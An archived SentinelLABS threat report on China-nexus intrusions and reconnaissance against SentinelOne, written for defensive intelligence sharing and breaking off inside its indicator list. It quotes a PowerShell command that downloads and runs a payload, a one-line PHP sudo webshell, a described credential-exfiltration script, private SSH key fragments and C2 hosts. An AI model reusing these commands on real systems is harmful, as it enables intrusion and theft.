{
	"id": "bb18d8cb-32c7-4b6e-bcfd-83b4d545be73",
	"created_at": "2026-04-06T00:06:44.798344Z",
	"updated_at": "2026-04-10T13:12:25.805137Z",
	"deleted_at": null,
	"sha1_hash": "d2b4b96425502cfbec3335386b42dd1860650e47",
	"title": "Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5547451,
	"plain_text": "Follow the Smoke | China-nexus Threat Actors Hammer At the\r\nDoors of Top Tier Targets\r\nBy Aleksandar Milenkoski \u0026 Tom Hegel\r\nPublished: 2025-06-09 · Archived: 2026-04-05 22:22:56 UTC\r\nExecutive Summary\r\nIn October 2024, SentinelLABS observed and countered a reconnaissance operation targeting SentinelOne,\r\nwhich we track as part of a broader activity cluster named PurpleHaze.\r\nAt the beginning of 2025, we also identified and helped disrupt an intrusion linked to a wider ShadowPad\r\noperation. The affected organization was responsible for managing hardware logistics for SentinelOne\r\nemployees at the time.\r\nA thorough investigation of SentinelOne’s infrastructure, software, and hardware assets confirmed that the\r\nattackers were unsuccessful and SentinelOne was not compromised by any of these activities.\r\nThe PurpleHaze and ShadowPad activity clusters span multiple partially related intrusions into different\r\ntargets occurring between July 2024 and March 2025. The victimology includes a South Asian government\r\nentity, a European media organization, and more than 70 organizations across a wide range of sectors.\r\nWe attribute the PurpleHaze and ShadowPad activity clusters with high confidence to China-nexus threat\r\nactors. We loosely associate some PurpleHaze intrusions with actors that overlap with the suspected\r\nChinese cyberespionage groups publicly reported as APT15 and UNC5174.\r\nThis research underscores the persistent threat Chinese cyberespionage actors pose to global industries and\r\npublic sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity\r\nvendors.\r\nOverview\r\nThis research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter\r\nof 2025. 
This post expands upon previous SentinelLABS research, which provides an overview of threats against\r\ncybersecurity vendors, including SentinelOne, ranging from financially motivated crimeware to targeted attacks\r\nby nation-state actors. This research focuses specifically on the subset of threats targeting SentinelOne and others\r\nthat we attribute to China-nexus threat actors.\r\nBy disclosing details of the threat activities we have faced, we bring into focus an aspect of the threat landscape\r\nthat has received limited attention in public cyber threat intelligence discourse: the targeting of cybersecurity\r\nvendors. Our objective is to contribute to strengthening industry defenses by promoting transparency and\r\nencouraging collaboration. Cybersecurity companies are high-value targets for threat actors due to their protective\r\nroles, deep visibility into client environments, and ability to disrupt adversary operations. The findings detailed in\r\nthis post highlight the persistent interest of China-nexus actors in these organizations.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 1 of 18\n\nThis research focuses on the following activities targeting SentinelOne, as well as suspected related operations\r\nidentified during our investigations:\r\nAn intrusion into an IT services and logistics organization, which was responsible at the time for managing\r\nhardware logistics for SentinelOne employees.\r\nExtensive remote reconnaissance of SentinelOne servers intentionally reachable from the Internet by virtue\r\nof their functionality.\r\nWe promptly informed the IT services and logistics organization of the intrusion details. 
A thorough investigation\r\ninto SentinelOne’s infrastructure, software, and hardware assets found no evidence of compromise.\r\nAt this point, it remains unclear whether the perpetrators’ focus was solely on the targeted IT logistics organization\r\nor if they intended to extend their reach to downstream organizations as well. Nevertheless, this case underscores\r\nthe persistent threat posed by suspected Chinese threat actors, who have a history of seeking to establish strategic\r\nfootholds to potentially compromise downstream entities.\r\nAs for the reconnaissance activity, we promptly identified and mapped the threat actor’s infrastructure involved in\r\nthis operation as soon as it began. A thorough investigation of SentinelOne servers probed by the attackers\r\nrevealed no signs of compromise. We assess with high confidence that the threat actor’s activities were limited to\r\nmapping and evaluating the availability of select Internet-facing servers, likely in preparation for potential future\r\nactions. 
Continuous monitoring of network traffic to our servers, which is part of established and continuing\r\npractice for protecting SentinelOne assets exposed to the Internet, enabled rapid detection and increased scrutiny\r\nto the reconnaissance activities, effectively mitigating any potential risks.\r\nFurther investigations uncovered multiple, partially related intrusions and clusters of activity characteristic of\r\nmodern Chinese-nexus operations:\r\nActivity A: June 2024 intrusion into a South Asian government entity\r\nActivity B: A set of intrusions impacting organizations worldwide occurring between July 2024 and March\r\n2025\r\nActivity C: Intrusion into an IT services and logistics company at the beginning of 2025\r\nActivity D: October 2024 intrusion into the same government entity compromised in June 2024\r\nActivity E: October 2024 reconnaissance activity targeting SentinelOne\r\nActivity F: September 2024 intrusion into a leading European media organization\r\nThe next two sections provide an overview of these activities, including timelines, points of overlap, and our\r\nattribution assessments, followed by concrete technical details, such as observed TTPs, malware, and\r\ninfrastructure to enable other organizations in related sectors to investigate and mitigate similar sets of activity.\r\nOverview | ShadowPad Intrusions\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 2 of 18\n\nShadowPad activity, June 2024 – March 2025\r\nIn June 2024, SentinelLABS observed threat actor activity involving the ShadowPad malware targeting a South\r\nAsian government entity that provides IT solutions and infrastructure across multiple sectors (Activity A). 
The\r\nShadowPad sample we retrieved was obfuscated using a variant of ScatterBrain, an evolution of the ScatterBee\r\nobfuscation mechanism.\r\nBased on ShadowPad implementation characteristics, we identified additional samples that revealed broader\r\nactivity taking place between July 2024 and March 2025, spanning a wide range of victims globally (Activity B).\r\nUsing C2 netflow and SentinelOne telemetry data, SentinelLABS uncovered over 70 victims across sectors such\r\nas manufacturing, government, finance, telecommunications, and research. Potentially affected SentinelOne\r\ncustomers were proactively contacted by our Threat Discovery and Response (TDR) teams. One of the impacted\r\nentities was an IT services and logistics company, which had been responsible for managing hardware logistics for\r\nSentinelOne employees during that period (Activity C).\r\nWe attribute these intrusions with high confidence to China-nexus actors, with ongoing efforts aimed at\r\ndetermining the specific threat clusters involved. ShadowPad is a closed-source modular backdoor platform used\r\nby multiple suspected China-nexus threat actors to conduct cyberespionage. Google Threat Intelligence Group has\r\nobserved the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters\r\nassociated with the suspected Chinese APT umbrella actor APT41.\r\nSeveral of the ShadowPad samples and infrastructure we identified have also been documented in previous public\r\nreporting on recent ShadowPad activities, including research published by TrendMicro, Orange Cyberdefense, and\r\nCheck Point. 
Some of these activities have included the deployment of ransomware referred to as NailaoLocker,\r\nthough the motive remains unclear, whether for financial gain or as a means of distraction, misattribution, or\r\nremoval of evidence.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 3 of 18\n\nOverview | The PurpleHaze Activity Cluster\r\nPurpleHaze activity, September – October 2024\r\nIn early October 2024, SentinelLABS observed new threat actor activity (Activity D) at the same South Asian\r\ngovernment entity compromised using ShadowPad in June 2024 (Activity A).\r\nThis intrusion involved backdoors that we classify as part of a malware cluster designated GOREshell, our\r\ndesignation for a loose malware cluster that includes the open-source reverse_ssh backdoor and its custom\r\nvariants, which we have observed in targeted attacks. While these variants exhibit variations in implementation,\r\nall share code similarities with the client component of reverse_ssh .\r\nWe track some of the infrastructure used in this intrusion as part of an operational relay box (ORB) network used\r\nby several suspected Chinese cyberespionage actors, particularly a threat group that overlaps with public reporting\r\non APT15. The use of ORB networks is a growing trend among Chinese threat groups, since they can be rapidly\r\nexpanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their\r\nattribution challenging. 
APT15, also historically referred to as Ke3Chang and Nylon Typhoon, is a suspected\r\nChinese cyberespionage actor known for its global targeting of critical sectors, including telecommunications,\r\ninformation technology, and government organizations.\r\nFurther, in October 2024, the same month as the activity targeting the South Asian government entity,\r\nSentinelLABS observed remote connections to Internet-facing SentinelOne servers for reconnaissance (Activity\r\nE). Based on significant overlaps in infrastructure management, as well as domain creation and naming practices,\r\nwe associate with high confidence the infrastructure observed in the reconnaissance operation with that used by\r\nthe threat actor targeting the South Asian government entity (Activity D). This suggests the involvement of the\r\nsame threat actor, or of a third-party entity responsible for managing infrastructure for multiple threat groups, a\r\ncommon practice in the Chinese cyberespionage landscape.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 4 of 18\n\nIn late September 2024, a few weeks before the October activities, SentinelLABS observed an intrusion into a\r\nleading European media organization (Activity F). Our investigation revealed overlaps in the tools used during\r\nthis intrusion and the October 2024 activity targeting the South Asian government entity (Activity D). This\r\nincludes the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice (THC), a\r\ncommunity of cybersecurity researchers.\r\nActivity D and Activity F are the first instances in which we have observed THC tooling used in the context of\r\nAPT activities.\r\nWe attribute Activity F with high confidence to a China-nexus actor, loosely associating it with a suspected\r\nChinese initial access broker tracked as UNC5174 by Mandiant. 
We acknowledge the possibility that post-intrusion activities may have been conducted by a different threat group.\r\nThe threat actor leveraged ORB network infrastructure, which we assess to be operated from China, and exploited\r\nthe CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before\r\nthe vulnerabilities were publicly disclosed. This intrusion method suggests the involvement of UNC5174, which is\r\nassessed to be a contractor for China’s Ministry of State Security (MSS) primarily focusing on gaining access and\r\nspecializing in exploiting vulnerabilities in targeted systems. After compromising these systems, UNC5174 is\r\nsuspected of transferring access to other threat actors.\r\nIn January 2025, CISA and the FBI released a joint advisory reporting threat actor activities that also took place in\r\nSeptember 2024, involving the chained exploitation of CVE-2024-8963 and CVE-2024-8190, without providing\r\nspecific attribution assessments. In March 2025, the French Cybersecurity Agency (ANSSI) released its 2024\r\ncyber threat overview report, which documents intrusions that occurred in September 2024, involved the same\r\nvulnerabilities, and show overlaps in TTPs associated with UNC5174.\r\nAdditionally, Mandiant has observed UNC5174 exploiting the CVE-2023-46747 and CVE-2024-1709\r\nvulnerabilities and deploying a publicly available backdoor tracked as GOREVERSE. Strings and code segments\r\nin the public GOREVERSE YARA rule provided by Mandiant match the reverse_ssh backdoor, placing\r\nGOREVERSE in the GOREshell malware cluster, samples of which we observed in both this intrusion and the\r\nOctober 2024 activity targeting the South Asian government entity.\r\nWe collectively track Activity D, E and F as the PurpleHaze threat cluster. 
While we attribute PurpleHaze with\r\nhigh confidence to China-nexus threat actors, investigations continue to determine the specific threat groups\r\nbehind the activities and their potential links to the June 2024 and later ShadowPad intrusions (Activity A, B, and\r\nC).\r\nWe do not rule out the involvement of distinct threat groups or the possibility of multiple intrusions conducted by\r\nthe same threat actor, especially given the widespread use of publicly available tools and the extensive sharing of\r\nmalware, infrastructure, and operational practices among Chinese threat groups. We also consider the possibility\r\nthat access may have been transferred between different actors, particularly in light of the suspected involvement\r\nof UNC5174.\r\nTechnical Details | ShadowPad Intrusions\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 5 of 18\n\nWe present below technical details on the ShadowPad intrusion into the South Asian government entity in June\r\n2024 (Activity A), as well as on the broader ShadowPad activities that took place between July 2024 and March\r\n2025 (Activity B and C).\r\nActivity A | ShadowPad and ScatterBrain Obfuscation\r\nThis intrusion involved the deployment of a ShadowPad sample named AppSov.exe . The threat actor deployed\r\nAppSov.exe by executing a PowerShell command that performs the following actions:\r\nDownloads a file named x.dat from a remote endpoint using curl.exe after a 60-second delay.\r\nSaves the downloaded file as AppSov.exe in the C:\\ProgramData\\ directory.\r\nLaunches the executable using the Start-Process PowerShell command.\r\nReboots the system after a delay of 30 minutes.\r\nsleep 60;curl.exe -o c:\\programdata\\AppSov.EXE http://[REDACTED]/dompdf/x.dat;start-process c:\\progra\r\nThe endpoint hosting x.dat was a previously compromised system within the same organization. 
Our analysis\r\nrevealed that malware artifacts had been deployed on this system approximately one month prior to the\r\nShadowPad deployment. These include the agent component of the Nimbo-C2 open-source remote access\r\nframework, as well as a PowerShell script that performs the following actions:\r\nCollects sensitive user data (documents, credentials, and cryptographic material) by recursively searching\r\nC:\\Users\\ for files modified in the previous 600 days and with the following extensions: *.xls ,\r\n*.xlsx , *.ods , *.txt , *.pem , *.cert , and *.pfx .\r\nCopies the collected files to a temporary folder at C:\\windows\\vss\\temp .\r\nArchives the collected files into an archive file named with the system’s MAC address and date, likely for\r\ntracking compromised endpoints.\r\nEncrypts and password-protects the archive using 7-Zip with the password @WsxCFt6\u0026UJMmko0 , ensuring\r\nthe data is obfuscated from inspection.\r\nExfiltrates the encrypted archive via a curl POST request to a hardcoded URL:\r\nhttps[://]45.13.199[.]209/rss/rss.php .\r\nRemoves traces by deleting the temporary folder, archive, and DAT files after exfiltration to avoid\r\ndetection and forensic recovery.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 6 of 18\n\nPowerShell exfiltration script\r\nThe Nimbo-C2 agent was deployed to C:\\ProgramData\\Prefetch\\PfSvc.exe , likely masquerading as a\r\nPrivacyware Privatefirewall executable.\r\nWe have not previously observed the use of Nimbo-C2 or variants of the PowerShell exfiltration script in the\r\ncontext of suspected Chinese APT activity. 
Previous research has documented the use of Nimbo-C2 in operations\r\nattributed to APT-K-47 (also known as Mysterious Elephant), a threat actor believed to originate from South Asia.\r\nThe deployment of the ShadowPad sample AppSov.exe raises several possibilities:\r\nthe same threat actor conducted both the earlier activity and the ShadowPad deployment,\r\naccess was handed off to, or leveraged by, a second actor, or\r\ntwo distinct actors operated independently within the same environment.\r\nAppSov.exe was obfuscated using a variant of ScatterBrain. The malware uses the domain\r\nnews.imaginerjp[.]com and the IP address 65.38.120[.]110 for C2 communication, leveraging DNS over\r\nHTTPS (DoH) in an attempt to evade detection by Base-64 encoding queried domains and obscuring DNS traffic\r\nfrom monitoring systems.\r\nhttps[:\r\nAppSov.exe is obfuscated using dispatcher routines that alter control flow, displacements placed after each\r\ninvocation of these routines, and opaque predicates. The malware verifies its integrity using the constant values\r\n0x89D17427 , 0x254733D6 , 0x6FE2CF4E , and 0x110302D6 . It is distributed with three modules: one with the ID\r\n0x0A and two with the ID 0x20 . 
The ShadowPad module IDs designate different types of modules, including\r\nconfiguration data or code that implements malware functionalities such as injection or data theft.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 7 of 18\n\nAppSov.exe: ShadowPad module IDs and sizes\r\nAppSov.exe: Deobfuscated dispatcher routine\r\nFor a detailed overview of the ScatterBrain obfuscation mechanism and additional ShadowPad implementation\r\ndetails, we refer to previous research by Google Threat Intelligence Group.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 8 of 18\n\nActivity B \u0026 C | A Global ShadowPad Operation\r\nBased on various implementation overlaps with AppSov.exe , including configuration data as well as custom\r\ndecryption and integrity verification constant values, we identified multiple additional ShadowPad samples\r\nobfuscated using ScatterBee variants. This also led to the discovery of related infrastructure, including the\r\nShadowPad C2 servers dscriy.chtq[.]net and updata.dsqurey[.]com , as well as the suspected ShadowPad-related domains network.oossafe[.]com and notes.oossafe[.]com .\r\nDeobfuscated integrity verification routine in AppSov.exe\r\nDeobfuscated integrity verification routine in another ShadowPad sample\r\nSome of the samples we identified differ in execution from AppSov.exe . Instead of embedding the full\r\nShadowPad functionality and configuration within a single executable, they are implemented as Windows DLLs\r\ndesigned to be loaded by specific legitimate executables vulnerable to DLL hijacking. 
These DLLs then load an\r\nexternal file with an eight-character name and the .tmp extension, for example 1D017DF2.tmp .\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 9 of 18\n\nUsing C2 netflow and SentinelOne telemetry data, we identified a broad range of victim organizations\r\ncompromised by the ShadowPad samples we discovered. Between July 2024 and March 2025, this malware was\r\ninvolved in intrusions at over 70 organizations across multiple regions globally, spanning sectors such as\r\nmanufacturing, government, finance, telecommunications, and research. Among the victims was the IT services\r\nand logistics company that was managing hardware logistics for SentinelOne employees at the time (Activity C).\r\nGeographical distribution of victims\r\nWe suspect that the most common initial access vector involved the exploitation of Check Point gateway devices,\r\nconsistent with previous research on this topic. We also observed communication to ShadowPad C2 servers\r\noriginating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential\r\nexploitation of these systems as well.\r\nTechnical Details | PurpleHaze\r\nWe present below technical details on intrusions that are part of the PurpleHaze threat cluster: the intrusion into\r\nthe South Asian government entity in October 2024 (Activity D, the same organization compromised using\r\nShadowPad in June 2024), the reconnaissance of SentinelOne infrastructure in October 2024 (Activity E), and the\r\nintrusion into the European media organization in September 2024 (Activity F).\r\nActivity D | GOREshell \u0026 a China-based ORB Network\r\nIn early October 2024, we detected system reconnaissance and malware deployment activities on a workstation\r\nwithin the South Asian government entity. 
The threat actor executed the ipconfig Windows command to query\r\nnetwork configuration and established a connection to IP address 103.248.61[.]36 on port 443. The adversary\r\nthen created the C:\\Program Files\\VMware\\VGAuth directory and downloaded an archive file named\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 10 of 18\n\nVGAuth1.zip from 103.248.61[.]36 ; after extracting its contents into the VGAuth directory, the archive was\r\ndeleted.\r\nThe archive file contained two executables: a legitimate VGAuthService.exe executable and a malicious DLL file\r\nnamed glib-2.0.dll (original filename: libglib-2.0-0.dll ), which masquerades as a legitimate GLib–2.0\r\nlibrary file.\r\nVGAuthService.exe implements the VMware Guest Authentication Service. The threat actor deployed version\r\n11.3.5.59284 , signed by VMWare and compiled on Tuesday, August 31, 2021, 06:14:07 UTC. This version is\r\nvulnerable to DLL hijacking.\r\nThe threat actor then created a new Windows service named VGAuthService , which automatically starts upon\r\nsystem boot, runs the VGAuthService.exe executable, and displays as Alias Manager and Ticket Service .\r\nWhen the service was started, VGAuthService.exe loaded and executed the malicious glib-2.0.dll library\r\nfile.\r\nsc create VGAuthService binPath= \"\\\"C:\\\\Program Files\\\\VMware\\\\\\VGAuth\\\\VGAuthService.exe\\\"\" start=au\r\nglib-2.0.dll implements the GOREshell backdoor, which uses reverse_ssh functionalities to establish SSH\r\nconnections to attacker-controlled endpoints. The backdoor is implemented in the Go programming language and\r\nobfuscated using Garble, including string literals, package paths, and function names. 
It uses the cgo library to\r\ninvoke C code.\r\nglib-2.0.dll: Obfuscated form of the string Fail to detect service: %v\r\nglib-2.0.dll contains a private SSH key used for establishing SSH connections to the threat actor’s C2 server.\r\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZWQyNTUxOQAAACABqioIxWKMLg7cKJuRt\r\nThe malware was configured to use downloads.trendav[.]vip for C2 purposes. This domain resolved to\r\n142.93.214[.]219 at the time of the activity. glib-2.0.dll establishes SSH connections over the Websocket\r\nprotocol ( wss[://]downloads.trendav[.]vip:443 ).\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 11 of 18\n\nNetwork request issued by glib-2.0.dll\r\nThe threat actor deployed GOREshell variants not only on Windows systems but also on Linux. This includes two\r\nsamples: one masquerading as the snapd Linux service and the other as the update-notifier service. The\r\nthreat actor deployed both samples as Linux services, which included creating service configuration files, such as\r\n/usr/lib/systemd/system/update-notifier.service .\r\nThe content of update-notifier.service\r\nIn contrast to update-notifier , which is obfuscated using Garble and packed with UPX, snapd is not\r\nobfuscated. Both samples use epp.navy[.]ddns[.]info as their C2 servers and are configured to proxy\r\nconnections through a local IP address over port 8080. Additionally, both samples store the same private SSH key\r\nas glib-2.0.dll .\r\nBased on the private key stored in glib-2.0.dll , snapd , and update-notifier , we discovered an additional\r\nGOREshell variant, which was uploaded on a malware sharing platform in September 2023. This GOREshell\r\nvariant is implemented as a tapisrv.dll library file (Microsoft Windows Telephony Server) and loaded as a\r\nWindows service by the svchost.exe service container process. 
The malware uses the\r\nmail.ccna[.]organiccrap[.]com domain for C2 purposes.\r\nThe discovery of the tapisrv.dll sample indicates reuse of the private key in intrusions separated by a\r\nconsiderable period.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 12 of 18\n\nPrivate key reuse\r\nWe associate some of the GOREshell C2 infrastructure with an ORB network, which we track as being operated\r\nfrom China and actively used by several suspected Chinese cyberespionage actors, including overlaps with\r\nAPT15.\r\nThe threat actor made significant efforts to obscure their activity and remove evidence of their presence, including\r\ntimestomping GOREshell executable files and deploying a log removal tool on Linux systems, specifically at the\r\n/usr/sbin/mcl filepath.\r\nOur analysis of mcl suggests that the executable is likely a compiled and modified version of the source code of\r\na tool called clear13 , developed by members of The Hacker’s Choice community. The source code of clear13\r\nis publicly available on GitHub.\r\nThe mcl executable is packed using a custom-modified version of UPX. 
The tool supports four commands,\r\nwhich are presented to the user through a help menu.\r\nCommand\r\nDisplayed\r\nhelp text\r\nDescription\r\nsudo sudo cmd\r\nExecutes a specified command ( cmd ) with elevated privileges using\r\nsudo .\r\nclear clear name\r\nRemoves the last entry containing a specified username ( name ) from\r\n/var/log/wtmp , /var/run/utmp , and /var/log/lastlog .\r\nsecure\r\nsecure\r\ntimeString\r\nRemoves all entries matching a specified pattern ( timeString ) from\r\n/var/log/secure .\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 13 of 18\n\nhistory\r\nhistory\r\nleftNum\r\nTruncates the user command history, keeping only a specified number of\r\nentries ( leftNum ).\r\nActivity E | Probing \u0026 Reconnaissance of SentinelOne Infrastructure\r\nIn October 2024, SentinelLABS observed consistent attempts to establish remote connections to multiple Internet-facing SentinelOne servers over port 443 for reconnaissance purposes.\r\nOur analysis of the infrastructure associated with this activity revealed links to the October 2024 intrusion into the\r\nSouth Asian government entity (Activity D).\r\nWe identified server characteristics and domain registration patterns suggesting coordinated infrastructure\r\nmanagement and bulk domain registration, likely carried out by the same threat actor conducting reconnaissance\r\non SentinelOne infrastructure and involved in Activity D, or by a third-party entity responsible for managing the\r\ninfrastructure used in both activities.\r\nThe connections we initially observed originated from a virtual private server (VPS) that used a C2 server as a\r\nproxy. 
At the time of the activity, the server had an IP address of 128.199.124[.]136 , which was mapped to the\r\ndomain name tatacom.duckdns[.]org and is designed to appear as part of a major South Asian\r\ntelecommunications provider’s infrastructure.\r\nBased on a unique server fingerprint, SentinelLABS discovered an extensive collection of related network\r\ninfrastructure.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 14 of 18\n\nInfrastructure overview\r\nThe C2 domain downloads.trendav[.]vip , observed in Activity D, resolved to the IP address\r\n142.93.214[.]219 . We also identified this IP address based on the server fingerprint. Furthermore, the IP address\r\nof a server associated with the same fingerprint, 143.244.137[.]54 , was mapped to the domain name\r\ncloud.trendav[.]co in October 2024. This domain name overlaps with downloads.trendav[.]vip .\r\nAdditionally, historical domain registration records show that the root domain trendav[.]vip was originally\r\nregistered through Dynadot Inc., on 24 October 2023, at 13:05:29 UTC. Identifying all domains registered through\r\nthe same registrar at the exact same date and time (to the second) reveals the domains secmailbox[.]us and\r\nsentinelxdr[.]us , the latter of which likely masquerades as SentinelOne infrastructure.\r\nBetween February and April 2025, the sentinelxdr[.]us domain resolved to 142.93.214[.]219 , the same IP\r\naddress that downloads.trendav[.]vip resolved to in October 2024.\r\nIn October 2024, mail.secmailbox[.]us resolved to 142.93.212[.]42 . 
Like the server at IP address\r\n142.93.214[.]219 ( downloads.trendav[.]vip/sentinelxdr[.]us ), this server shared the same server\r\nfingerprint.\r\nFurthermore, domain registration data for sentinelxdr[.]us was updated on 25 September 2024, at 01:43:46\r\nUTC, a date and time that is identical to an update of the registration data of trendav[.]vip .\r\nActivity F | The Return of dsniff\r\nThe late September 2024 intrusion into the European media organization showed overlaps in tooling with the\r\nOctober 2024 intrusion into the South Asian government entity (Activity D). These overlaps include the use of the\r\nGOREshell backdoor and publicly available tools developed by The Hacker’s Choice community.\r\nThe threat actor deployed a UPX-packed GOREshell sample, which was configured to use 107.173.111[.]26\r\nover the WebSocket protocol for C2 communication ( wss[://]107.173.111[.]26:443 ). The executable file we\r\nretrieved contains a private SSH key and the public SSH key fingerprint\r\nf0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590 .\r\nMC4CAQAwBQYDK2VwBCIEIMsHXDEWgXiPFrIjDOSXZqReC2HHiS6kgoZT0YgHlK87\r\nBased on the fingerprint, we identified a Garble-obfuscated GOREshell sample that was uploaded to a malware\r\nsharing platform from Iran in late July 2024. This GOREshell sample also contains a private SSH key and is\r\nconfigured to use the same C2 server, 107.173.111[.]26 , over the TLS protocol\r\n( tls[://]107.173.111[.]26:80 ).\r\nThis suggests threat actor activity since at least July 2024, possibly targeting organizations in both Europe and the\r\nMiddle East.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 15 of 18\n\nMC4CAQAwBQYDK2VwBCIEINArpOAwJO2+lv9Da+PzmkbKxGhMcapQ+/NhUq4nifvh\r\nThe threat actor also deployed version 2.5a1 of dsniff, a collection of tools for network auditing and penetration\r\ntesting. 
With active development of dsniff having been discontinued for over 15 years, our investigation of\r\npublic source code repositories revealed that the THC community has released version 2.5a1 in an effort to resume\r\nactive maintenance of the project.\r\nTo obfuscate their presence, the threat actor timestomped deployed executables, setting their creation date to\r\nSeptember 15, 2021. After gaining initial access to the environment, the perpetrators deployed a simple PHP\r\nwebshell that enables remote command execution by passing commands in the request parameter named a and executing them\r\nwith elevated privileges using sudo.\r\n\u003c?php system('/bin/sudo '. @$_REQUEST['a']);?\u003e\r\nOur investigation of system and network traffic artifacts strongly suggests that the threat actor gained an initial\r\nfoothold by exploiting CVE-2024-8963 in conjunction with CVE-2024-8190 (both Ivanti Cloud Services\r\nAppliance vulnerabilities) on September 5, 2024, a few days before their public disclosure.\r\nWe track some of the malicious infrastructure used in this attack as part of an ORB network, which we suspect is\r\noperated from China and includes compromised network edge devices.\r\nConclusions\r\nThis post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries\r\nand public sector organizations, including cybersecurity vendors themselves. The activities detailed in this\r\nresearch reflect the strong interest these actors have in the very organizations tasked with defending digital\r\ninfrastructure.\r\nOur findings underscore the critical need for constant vigilance, robust monitoring, and rapid response\r\ncapabilities. 
By publicly sharing details of our investigations, we aim to provide insight into the rarely discussed\r\ntargeting of cybersecurity vendors, helping to destigmatize sharing of IOCs related to these campaigns, and thus\r\ncontribute to a deeper understanding of the tactics, objectives, and operational patterns of China-nexus threat\r\nactors. As these adversaries continue to adapt to our response efforts, it’s essential that defenders prioritize\r\ntransparency, intelligence sharing, and coordinated action over the fear of reputational harm.\r\nWe encourage others in the industry to adopt a proactive approach to threat intelligence sharing and defense\r\ncoordination, recognizing that collective security strengthens the entire community.\r\nWe are grateful to our partners at Lumen Technologies Black Lotus Labs for their collaboration and support.\r\nIndicators of Compromise\r\nSHA-1 Hashes\r\nValue Note\r\n106248206f1c995a76058999ccd6a6d0f420461e Webshell\r\n411180c89953ab5e0c59bd4b835eef740b550823 GOREshell (snapd)\r\n4896cfff334f846079174d3ea2d541eec72690a0 Nimbo-C2 agent (PfSvc.exe)\r\n5ee4be6f82a16ebb1cf8f35481c88c2559e5e41a ShadowPad\r\n7dabf87617d646a9ec3e135b5f0e5edae50cd3b9 GOREshell (update-notifier)\r\na31642046471ec138bb66271e365a01569ff8d7f GOREshell\r\na88f34c0b3a6df683bb89058f8e7a7d534698069 ShadowPad\r\naa6a9c25aff0e773d4189480171afcf7d0f69ad9 ShadowPad\r\nc43b0006b3f7cd88d31aded8579830168a44ba79 ShadowPad\r\ncb2d18fb91f0cd88e82cb36b614cfedf3e4ae49b GOREshell (glib-2.0.dll)\r\ncbe82e23f8920512b1cf56f3b5b0bca61ec137b9 Legitimate VMWare executable (VGAuthService.exe)\r\nebe6068e2161fe359a63007f9febea00399d7ef3 GOREshell\r\nf52e18b7c8417c7573125c0047adb32d8d813529 ShadowPad (AppSov.exe)\r\nDomains\r\nValue Note\r\ncloud.trendav[.]co Suspected PurpleHaze infrastructure\r\ndownloads.trendav[.]vip GOREshell C2 
